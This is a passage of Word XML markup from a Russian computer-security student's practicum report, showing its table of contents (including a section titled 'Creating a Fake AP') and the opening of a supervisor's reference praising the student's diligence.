              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Введение</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75213384 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15FC5221" w14:textId="6BBD1240" w:rsidR="000C0E85" w:rsidRPr="000C0E85" w:rsidRDefault="000C0E85" w:rsidP="000C0E85">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc75213385" w:history="1">
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Теоретическая часть</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75213385 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0BE772B0" w14:textId="62EF672C" w:rsidR="000C0E85" w:rsidRPr="000C0E85" w:rsidRDefault="000C0E85" w:rsidP="000C0E85">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc75213386" w:history="1">
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Практическая часть</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75213386 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49279457" w14:textId="04DF713B" w:rsidR="000C0E85" w:rsidRPr="000C0E85" w:rsidRDefault="000C0E85" w:rsidP="000C0E85">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:spacing w:line="360" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc75213387" w:history="1">
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Создание </w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Fake</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AP</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75213387 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E72B59C" w14:textId="45DE908E" w:rsidR="000C0E85" w:rsidRPr="000C0E85" w:rsidRDefault="000C0E85" w:rsidP="000C0E85">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc75213388" w:history="1">
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Заключение</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75213388 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61ADD9A4" w14:textId="01CDF530" w:rsidR="000C0E85" w:rsidRPr="000C0E85" w:rsidRDefault="000C0E85" w:rsidP="000C0E85">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc75213389" w:history="1">
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Литература</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75213389 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65835CB7" w14:textId="3510C075" w:rsidR="000C0E85" w:rsidRPr="000C0E85" w:rsidRDefault="000C0E85" w:rsidP="000C0E85">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc75213390" w:history="1">
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Приложение 1</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75213390 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B88C725" w14:textId="4B9A056B" w:rsidR="000C0E85" w:rsidRPr="000C0E85" w:rsidRDefault="000C0E85" w:rsidP="000C0E85">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc75213391" w:history="1">
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Приложение 2</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75213391 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="313E5521" w14:textId="494CE182" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="3F54A602" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D717E75" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>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Характеристика</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760D1F46" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7075B949" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">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Выдана студенту 4 курса, специальности «Компьютерная безопасность», специализации «Математические методы защиты информации», Мельникову Александру Олеговичу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F522545" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">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Мельников Александр Олегович в период с 22.02.2021 по 26.06.2021 года, проходил учебную практику (учебно-лабораторный практикум) на кафедре информационной безопасности ШЕН ДВФУ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6CBCBB" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">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 время прохождения практики Александр проявил усердие, тягу к знаниям, огромное желание и трудолюбие, а также неподдельный интерес к изучению материала, требуемого для написания отчета. Приходил на консультацию вовремя с перечнем вопросов, с подробным и исчерпывающим описанием о текущем состоянии практики, со списком отмеченных задач. Внимательно изучал предложенные материалы и литературу на интересующую тематику.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9124BC" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">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Мельников </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
